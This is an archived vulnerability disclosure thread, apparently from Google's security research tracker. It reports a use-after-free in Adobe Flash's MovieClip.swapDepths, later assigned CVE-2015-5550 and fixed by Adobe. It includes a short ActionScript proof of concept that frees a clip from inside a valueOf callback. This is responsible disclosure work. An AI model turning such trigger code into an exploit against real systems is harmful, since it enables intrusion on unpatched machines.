Adobe Flash: use-after-free in swapDepths

GoogleCodeExporter commented 8 years ago

There is a use-after-free in MovieClip.swapDepths, a POC is as follows:

var clip1 = this.createEmptyMovieClip("clip1", 1);
var clip2 = this.createEmptyMovieClip("clip2", 2);

var n = {valueOf: func, toString: func};

clip1.swapDepths(n);

function func(){

    clip1.removeMovieClip();
    //_root.createEmptyMovieClip("test", 1);

    trace("here");
    return "clip2";
    }

A swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 22 May 2015 at 2:21

Attachments:

GoogleCodeExporter commented 8 years ago

PSIRT-3737

Original comment by cev...@google.com on 26 May 2015 at 10:18

Added labels: Id-3737

GoogleCodeExporter commented 8 years ago

Original comment by scvi...@google.com on 28 May 2015 at 5:00

Added labels: Reported-2015-May-21
Removed labels: Reported-2015-05-21

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:31

Added labels: CVE-2015-5550

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:57

Changed state: Fixed

GoogleCodeExporter commented 8 years ago

Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html

Original comment by natashe...@google.com on 18 Aug 2015 at 7:35

Removed labels: Restrict-View-Commit

ITh4cker / google-security-research

Adobe Flash: use-after-free in swapDepths #403